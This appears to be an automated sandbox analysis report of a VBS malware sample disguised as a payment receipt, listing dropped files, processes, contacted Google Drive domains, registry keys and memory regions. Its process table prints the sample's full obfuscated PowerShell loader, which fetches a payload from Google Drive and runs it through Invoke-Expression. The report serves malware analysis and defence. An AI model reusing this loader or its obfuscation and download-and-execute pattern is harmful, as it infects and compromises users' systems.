Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
JUSTIFICANTE DE PAGO.vbs
|
ASCII text, with very long lines (362), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22vcjhx5.fss.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5izzs1v.z2z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Somesthesia.Ske
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function
Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne,
$Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB
silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk
Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1
T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl
Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti-
TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo
oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd
Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA
Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage
'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr
C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea
.amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du
spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre
AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa,
');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl
sInconiSpiriaBoros.M,resST,nerkTypiseOd.rl Pella&Ti sm& Hall Be pee N.ttcSawbohNontioDepre Fraso$incor ';Multiplikatorernes
(Ulnage 'domin$ .tolgStje lIn,oroSkarpbMut naBlo,llSt ig:CerasN MuniuOmplal GraniPluggnKanoedUnmelkKarbuoH.rdemTaws.sFolketFr.dreS,urrnMotte=Jrgen(P.eudcdebr.mI,cludVrks.
ommis/Mastec Foli Te.n$AmesiGMoolee Deicr.ninnm,seudiFi,kon bankd M.te)Ratla ');Multiplikatorernes (Ulnage 'Metop$H.insglgegulJulefoTrg,ebF.rmuaFortelDek.i:EndomPPost.cJvn,aeTeglbrNo
ennKontreKant,=Kia.c$Cu geB SkralUngkaiCamankass,cd YorkaFla,kaSa.ansalmineplumbsSeven9Mis n3Magts. Bunds ,udep MagnlStu,ei
FoshtDrosk(.anso$B,oncT S.rii Hal,mGra,ubDominaJuleflGodfreResorrDistrnMonete Gon,sSpad )Kolle ');$Blikdaases93=$Pcerne[0];Multiplikatorernes
(Ulnage 'hyste$MejetgKa hilGenneoScapub kil,aMo erl odbo:AltdeF StillKegleaRealla Udfre num dCecomeAfflas Cu a=Emo,iNMarsie
,ecywSolec-Vok eOKri,kbGromwjSpokee Alp.cm telt est R,kniSChampyPlatisFiksptRespeeSolstmArthr.SaalsNVedlieDentitNivel.C,ppeWPissoeTroopb
exogC .ndmlRubbeir.geneFertinR,abatOverk ');Multiplikatorernes (Ulnage 'Uns.c$ orkyFcornllLogisaFo,ocaAr heeRehabdKor,meIna.ssEdder.HalsyHNonnaeDe,okaLnmo,d
OctoeNi rorMakahsC.chi[,efen$DirekZ Rehoo VaadoPav,lt orskeBatekcMa.keh Ul,mnKluppi.progcMyeloiQuinta KratnMonod]Intra=Stj,t$AlmiruIlystnWel
cldehumoMaalegMacergZuluke .ecrdLgdsl ');$Afsbe=Ulnage 'Bi,isFVideolSpermaRensnaHulleeOutwrd Fu,deStabisSkr s.hymenDAur.doZ
chiw solinSnk mlGuffao Pr raMiliedToldsF Troni StrolV.scue Fu,u(Ballo$TetraBRussilimproi U,cokFelind Dis,aUn,ola Cha.sR puneAabe,sGreen9
,itz3Ene.r,,ngka$ Te.aSCompalMesenaAfgifvS.atuiSdmlkcPu.leiClarssAktivmGynec)Samm. ';$Afsbe=$Nulindkomsten[1]+$Afsbe;$Slavicism=$Nulindkomsten[0];Multiplikatorernes
(Ulnage ',uper$ sentg TodalRemado ,emtbBroncaSkridlIndfr:OtterbTrillr vsavnmattieForbdrStagniGenang Du.itPorceiAmbitgAntipt
Oret=Preme( emicTH.rtaePerfesQueuetviske-Ansl.PRgt baWhysutkonsehFrems Stvl$Dje aSDividl BeboaUd,mnvVe.stiCrittc phioila
insCanalmAntig)Brnee ');while (!$brnerigtigt) {Multiplikatorernes (Ulnage 'Stvht$FlgesgambitlLip roSk,lpbAi,maanrc,elRodma:UndisUSjl,gn
Sd,krStuk,eHarefeHexoslA.usts Vask=A.sor$brnebtFa.ulrSowe.u,arsveFinva ') ;Multiplikatorernes $Afsbe;Multiplikatorernes (Ulnage
'.eddaSMetattTropiakontrrSvendtArmad-GenneS Salgl Coque SvineNegripSemic L,sa4Drosc ');Multiplikatorernes (Ulnage ' St,r$Sadelg
GawklSheepo ZoanbJageraRejuvl Beta:Intrab VacirVitt nFeasie UdskrMarroiS.uthgpetertForhaiCtenogNicottStres=Ph.no( Go aT TrekeBlufrsO,dbotjudie-
eviPSpiseaIndsktMellsh.lymp Afste$ ndhfSAlkyllNydamaRegervBrygniPregucauto.iE,katsuma,dm rav) Uncr ') ;Multiplikatorernes
(Ulnage ' ,rom$Over g,minolOsteooAfganbPolysaUdstalTerme: chuPAnacrrT,anseHenleeOutwav adreaDresspRetshoAntiorMrkbaab.llitPe.arolys,nrRosin2Famil5Overw5Alon,=Perfi$C
zsegGlsnil PoleoTilskbF,rroaSa dslVatic: uldkSFre nkSamk.iHoopslAfhjed Tnd.psuperaVolvodR,ekadRa.ioe Tomjs Log kMe tra DisklHelfalHetere
Kavin SalgsFinan+Tomas+Doura% .uni$KompeP halac Intee GnomrIndslnSlgerereaff.RecescPhospol resuTu ann C aitAfter ') ;$Blikdaases93=$Pcerne[$Preevaporator255];}Multiplikatorernes
(Ulnage 'Dis,i$ Prs gJenvrl S.fforesunb ,ndhaG.ardl Etho: RagoePreofxRappetFritieUnshrn AfsluZonataCimeltSel.pePomfrsLin.e
Koord=Kunst LandsGUdsleeSomnitunapp-GoldrCG.nero.nrusnF,nget UdsteprobonChiddtLigni Disti$FideiSDurrylRosmuaAzotiv F,owi Ca
bc S,ili nugssBromams,kke ');Multiplikatorernes (Ulnage 'P gna$HammegM,cedl .dlaoAdvarbnyctiaSprngl Thai:SortkJUniveu.lassnNowisgTubereSpo.tnAntar
D.sm= Nati G nan[ ,ngsSamicryBrndesForvatKursueAssurmAntit.critiC Ejenoin,skn.atiivGlasbe Tet,rLollate.han] vera:Spe.t: OmdaF
GuilrAd.lsoWhaurmTra,sBSkaftaDisarsMrsgeeStutt6amanu4Haa dSSlvsmt,nartrP,rceiBeraanA tisgSt.rt(,fsbn$MaijaeS,imlxH riztv loueCheckn
ApotuBore,aMorget FredeBack,sHaema)Rekto ');Multiplikatorernes (Ulnage 'Kv li$ExcalgLipaelstatsoStamkbKapseadittel Gard:BatchFKvienoGaranr
dfylmOr.adi J.rln BrowdLeaves Mungk L,moeAbortdOutrieNedsksTill. Ba,sk=flako Opsp[S.oroSsubcayR,mblsTafiat wargestemmmGdann.
FilaT.tivkePursuxAger,tUigen.Su.phESk,ffnObskuc GardoOverbd etriTropin Petegsigte] Unco:Sfyrb:Sub oAFane,SAnnitC.tykpICo.meIMento.
NaioG telteDissotBrintSVidnet Regnr,mpori ayinnGaiasgRing (Ach.n$NonexJSusp.uBatisnRick gCaj.teL.dlenConvo) egre ');Multiplikatorernes
(Ulnage 'F.age$Te.reg Frikl UdenoKos.eb IldfaExtralNonig:sminkcMenarhlin,oeGor lcUfuldkOutruhAra ieLarmefrhabdtCun,ieWittitFrems=Preco$
multFCurcuoG anirInfiemBearii StubnFlovpd StiksDelp.kTot.ee Vidtd Yu,eeFablesDesta. Pe,isF lthuSkillbHerlisPolyctFo slr ForhiFor,in
ThyrgOptic( Spec2Ickin9Hotel7Inc,m6Forbr8Asphy4deute,Siksa2Civ l8Phyll0Unind8 In.v1Riste)Bykva ');Multiplikatorernes $checkheftet;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://go.micro
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.101.100
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.101.100
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1FF5BC70000
|
heap
|
page read and write
|
||
|
1FF6DBFD000
|
trusted library allocation
|
page read and write
|
||
|
E3474FE000
|
stack
|
page read and write
|
||
|
E3470FE000
|
stack
|
page read and write
|
||
|
1FF5DE2A000
|
trusted library allocation
|
page read and write
|
||
|
1FF5F8C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF5FAE6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
23079D40000
|
heap
|
page read and write
|
||
|
23079DE9000
|
heap
|
page read and write
|
||
|
1FF75E17000
|
heap
|
page execute and read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
||
|
23079E4A000
|
heap
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF5D630000
|
heap
|
page read and write
|
||
|
B62B6FF000
|
stack
|
page read and write
|
||
|
23079DEB000
|
heap
|
page read and write
|
||
|
1FF75DD0000
|
heap
|
page read and write
|
||
|
1FF5F4FF000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DE20000
|
trusted library allocation
|
page read and write
|
||
|
1A8F8ED0000
|
heap
|
page read and write
|
||
|
1FF75C49000
|
heap
|
page read and write
|
||
|
1FF75F5E000
|
heap
|
page read and write
|
||
|
D1A3FF000
|
unkown
|
page read and write
|
||
|
23079DFA000
|
heap
|
page read and write
|
||
|
1FF75CE5000
|
heap
|
page read and write
|
||
|
1FF5DE4D000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BB90000
|
heap
|
page read and write
|
||
|
1FF5BD80000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
23079D70000
|
heap
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
||
|
1FF5D640000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BF75000
|
heap
|
page read and write
|
||
|
1FF5DE39000
|
trusted library allocation
|
page read and write
|
||
|
B62B1FF000
|
stack
|
page read and write
|
||
|
1FF6D901000
|
trusted library allocation
|
page read and write
|
||
|
23079DEA000
|
heap
|
page read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
||
|
7DF448480000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF5ECD1000
|
trusted library allocation
|
page read and write
|
||
|
1FF5D590000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1FF6DAB6000
|
trusted library allocation
|
page read and write
|
||
|
1FF75C54000
|
heap
|
page read and write
|
||
|
1A8F8CE0000
|
heap
|
page read and write
|
||
|
2307A04B000
|
heap
|
page read and write
|
||
|
23079E1B000
|
heap
|
page read and write
|
||
|
E34707E000
|
stack
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
E346EFE000
|
stack
|
page read and write
|
||
|
23079E4A000
|
heap
|
page read and write
|
||
|
23079E0C000
|
heap
|
page read and write
|
||
|
1FF5DEA4000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD21000
|
heap
|
page read and write
|
||
|
E3471F7000
|
stack
|
page read and write
|
||
|
E34737E000
|
stack
|
page read and write
|
||
|
1FF75CB7000
|
heap
|
page read and write
|
||
|
23079D98000
|
heap
|
page read and write
|
||
|
1FF5F936000
|
trusted library allocation
|
page read and write
|
||
|
2307BC8D000
|
heap
|
page read and write
|
||
|
B62AEFF000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23079DF3000
|
heap
|
page read and write
|
||
|
2307A04E000
|
heap
|
page read and write
|
||
|
1FF5E2D1000
|
trusted library allocation
|
page read and write
|
||
|
23079E10000
|
heap
|
page read and write
|
||
|
1FF75C40000
|
heap
|
page read and write
|
||
|
1FF75CD0000
|
heap
|
page read and write
|
||
|
1FF5BCD0000
|
heap
|
page read and write
|
||
|
E346AA3000
|
stack
|
page read and write
|
||
|
1FF5F570000
|
trusted library allocation
|
page read and write
|
||
|
23079DF7000
|
heap
|
page read and write
|
||
|
23079DE9000
|
heap
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF75F56000
|
heap
|
page read and write
|
||
|
1FF5BF70000
|
heap
|
page read and write
|
||
|
1FF5FB24000
|
trusted library allocation
|
page read and write
|
||
|
23079E64000
|
heap
|
page read and write
|
||
|
E346B2E000
|
stack
|
page read and write
|
||
|
1FF5BD93000
|
heap
|
page read and write
|
||
|
1FF75FAF000
|
heap
|
page read and write
|
||
|
1FF75D2C000
|
heap
|
page read and write
|
||
|
1FF5DE4F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD5F000
|
heap
|
page read and write
|
||
|
1FF5D715000
|
heap
|
page read and write
|
||
|
1FF5D985000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
2307A040000
|
heap
|
page read and write
|
||
|
E346FFE000
|
stack
|
page read and write
|
||
|
1FF5D5C0000
|
trusted library allocation
|
page read and write
|
||
|
1FF5FB11000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BCFD000
|
heap
|
page read and write
|
||
|
1FF5DE2D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1FF75E20000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1A8F9060000
|
heap
|
page read and write
|
||
|
1FF5F932000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
23079E02000
|
heap
|
page read and write
|
||
|
1FF5F8B1000
|
trusted library allocation
|
page read and write
|
||
|
23079DEB000
|
heap
|
page read and write
|
||
|
1FF762A0000
|
heap
|
page read and write
|
||
|
1FF5FAFE000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DB28000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
1A8F8EF0000
|
heap
|
page read and write
|
||
|
1FF5F8EC000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BC90000
|
heap
|
page read and write
|
||
|
1FF5DE3D000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DE35000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DEA0000
|
trusted library allocation
|
page read and write
|
||
|
1A8F8DF0000
|
heap
|
page read and write
|
||
|
1FF6D974000
|
trusted library allocation
|
page read and write
|
||
|
1FF5F52C000
|
trusted library allocation
|
page read and write
|
||
|
1FF5D724000
|
heap
|
page read and write
|
||
|
2307BC8C000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1FF5FB0D000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DFCA000
|
trusted library allocation
|
page read and write
|
||
|
1FF5D8F0000
|
heap
|
page execute and read and write
|
||
|
23079DF3000
|
heap
|
page read and write
|
||
|
1FF5D670000
|
trusted library allocation
|
page read and write
|
||
|
1FF75F20000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1FF75F84000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF5BD1B000
|
heap
|
page read and write
|
||
|
E3473FE000
|
stack
|
page read and write
|
||
|
1FF5F53F000
|
trusted library allocation
|
page read and write
|
||
|
1FF75E41000
|
heap
|
page read and write
|
||
|
2307BC80000
|
heap
|
page read and write
|
||
|
B62B4FD000
|
stack
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
D1A4FF000
|
stack
|
page read and write
|
||
|
1FF5D5E0000
|
trusted library allocation
|
page read and write
|
||
|
1FF5F8D9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD16000
|
heap
|
page read and write
|
||
|
1A8F8CE8000
|
heap
|
page read and write
|
||
|
1FF5F72E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
2307B930000
|
heap
|
page read and write
|
||
|
23079D90000
|
heap
|
page read and write
|
||
|
2307A045000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF5F6B7000
|
trusted library allocation
|
page read and write
|
||
|
1FF5F4FC000
|
trusted library allocation
|
page read and write
|
||
|
E3472FB000
|
stack
|
page read and write
|
||
|
23079E14000
|
heap
|
page read and write
|
||
|
23079DB7000
|
heap
|
page read and write
|
||
|
23079E59000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
E346BEE000
|
stack
|
page read and write
|
||
|
B62B5FE000
|
stack
|
page read and write
|
||
|
23079DE1000
|
heap
|
page read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
1FF5D600000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD61000
|
heap
|
page read and write
|
||
|
B62AB1A000
|
stack
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BDC3000
|
heap
|
page read and write
|
||
|
23079E3A000
|
heap
|
page read and write
|
||
|
2307A049000
|
heap
|
page read and write
|
||
|
23079E0A000
|
heap
|
page read and write
|
||
|
23079E72000
|
heap
|
page read and write
|
||
|
23079DF0000
|
heap
|
page read and write
|
||
|
23079E1B000
|
heap
|
page read and write
|
||
|
E347177000
|
stack
|
page read and write
|
||
|
23079E5E000
|
heap
|
page read and write
|
||
|
D1A2FD000
|
stack
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
23079D50000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD37000
|
heap
|
page read and write
|
||
|
B62B7FB000
|
stack
|
page read and write
|
||
|
1FF75FBE000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1FF5DE63000
|
trusted library allocation
|
page read and write
|
||
|
E346BAE000
|
stack
|
page read and write
|
||
|
E346F7D000
|
stack
|
page read and write
|
||
|
1FF75F50000
|
heap
|
page read and write
|
||
|
23079E5C000
|
heap
|
page read and write
|
||
|
1A8F8F10000
|
heap
|
page read and write
|
||
|
1FF75E10000
|
heap
|
page execute and read and write
|
||
|
2307A04E000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
23079DD0000
|
heap
|
page read and write
|
||
|
23079E4A000
|
heap
|
page read and write
|
||
|
1FF5DFA5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1FF5F516000
|
trusted library allocation
|
page read and write
|
||
|
2307BC84000
|
heap
|
page read and write
|
||
|
1FF5D710000
|
heap
|
page read and write
|
||
|
1FF5FAEB000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BCE7000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
23079DB8000
|
heap
|
page read and write
|
||
|
B62AFFE000
|
stack
|
page read and write
|
||
|
23079DEE000
|
heap
|
page read and write
|
||
|
1FF75D04000
|
heap
|
page read and write
|
||
|
1FF5BCF5000
|
heap
|
page read and write
|
||
|
1FF5D901000
|
trusted library allocation
|
page read and write
|
||
|
B62B2FF000
|
stack
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF75D40000
|
heap
|
page execute and read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2307A04E000
|
heap
|
page read and write
|
||
|
1FF6D910000
|
trusted library allocation
|
page read and write
|
||
|
1FF5FB01000
|
trusted library allocation
|
page read and write
|
||
|
1FF5BD65000
|
heap
|
page read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
1FF5D63A000
|
heap
|
page read and write
|
||
|
E347F4E000
|
stack
|
page read and write
|
||
|
E347FCD000
|
stack
|
page read and write
|
||
|
1FF75E44000
|
heap
|
page read and write
|
||
|
E34757B000
|
stack
|
page read and write
|
||
|
E34747F000
|
stack
|
page read and write
|
||
|
1FF75F9A000
|
heap
|
page read and write
|
||
|
1FF75CC1000
|
heap
|
page read and write
|
||
|
23079E1A000
|
heap
|
page read and write
|
||
|
2307A048000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
1FF5FB3E000
|
trusted library allocation
|
page read and write
|
||
|
23079DCD000
|
heap
|
page read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
||
|
1FF5D5F0000
|
heap
|
page readonly
|
||
|
23079DFF000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
23079DEB000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
1A8F9065000
|
heap
|
page read and write
|
||
|
23079DDD000
|
heap
|
page read and write
|
||
|
1FF75C8D000
|
heap
|
page read and write
|
||
|
1FF5E268000
|
trusted library allocation
|
page read and write
|
||
|
E347278000
|
stack
|
page read and write
|
||
|
E346E7E000
|
stack
|
page read and write
|
||
|
23079E11000
|
heap
|
page read and write
|
||
|
1FF6DBEE000
|
trusted library allocation
|
page read and write
|
||
|
23079E3C000
|
heap
|
page read and write
|
||
|
1A8F8CED000
|
heap
|
page read and write
|
||
|
23079E2F000
|
heap
|
page read and write
|
There are 246 hidden memdumps, click here to show them.